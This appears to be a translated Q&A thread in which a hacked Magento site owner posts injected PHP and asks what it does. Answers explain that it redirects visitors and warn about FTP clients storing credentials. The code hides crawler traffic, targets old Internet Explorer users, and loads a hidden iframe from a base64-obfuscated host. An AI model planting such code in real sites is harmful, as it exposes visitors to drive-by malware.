问题描述
|
我只是在Magento 1.3.2.4安装中被黑客入侵。您能告诉我这段代码的目的是什么?
此外,如何阻止这种情况以及如何发现漏洞?
谢谢
function net_match ( $network,$ip ) {
$ip_arr = explode ( \'/\',$network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER[\'REMOTE_ADDR\'];
$user_agent = $_SERVER[\'HTTP_USER_AGENT\'];
$user_agent = $_SERVER[\"HTTP_USER_AGENT\"];
$IP = $_SERVER[\'REMOTE_ADDR\'].\".log\";
@mkdir(\'/tmp/Location/\');
$dfjgkbl=base64_decode(\'aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw\');
if(!file_exists(\"/tmp/Location/{$IP}\"))
{
if(
net_match(\'64.233.160.0/19\',$ip)==0 &&
net_match(\'66.102.0.0/20\',$ip)==0 &&
net_match(\'66.249.64.0/19\',$ip)==0 &&
net_match(\'72.14.192.0/18\',$ip)==0 &&
net_match(\'74.125.0.0/16\',$ip)==0 &&
net_match(\'89.207.224.0/24\',$ip)==0 &&
net_match(\'193.142.125.0/24\',$ip)==0 &&
net_match(\'194.110.194.0/24\',$ip)==0 &&
net_match(\'209.85.128.0/17\',$ip)==0 &&
net_match(\'216.239.32.0/19\',$ip)==0 &&
net_match(\'128.111.0.0/16\',$ip)==0 &&
net_match(\'67.217.0.0/16\',$ip)==0 &&
net_match(\'188.93.0.0/16\',$ip)==0
)
{
if(strpos($user_agent,\"Windows\") !== false)
{
if (preg_match(\"/MSIE 6.0/\",$user_agent) OR
preg_match(\"/MSIE 7.0/\",$user_agent) OR
preg_match(\"/MSIE 8.0/\",$user_agent)
)
{
echo \'<iframe frameborder=0 src=\"\'.$dfjgkbl.\'\" width=1 height=1 scrolling=no></iframe>\';
touch (\"/tmp/Location/{$IP}\");
}}}}
解决方法
它创建一个iframe,将人们引导到另一个站点。 dfjgkbl变量包含URL的base64编码;如果您想知道它是什么,可以使用在线base64解码器。我不会在此处粘贴它,因为基于您其余的代码,该URL可能包含Windows病毒。
, 只是一个友好的建议,如果您使用FileZilla作为FTP代理,它将保存的密码保存在xml文件中,则您的PC上可能存在病毒,可以将FileZilla连接到服务器并将其写入文件。还要检查您的CPanel并查找不是您创建的FTP帐户。可能并非如此,无论如何都要检查。
, 我对Total Commander也有类似的问题...病毒使用了TC FTP帐户并完全更改了我的网站(Joomla CMS),并将几乎所有的php文件都添加了类似的恶意代码。
,
$dfjgkbl=base64_decode(\'aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw\');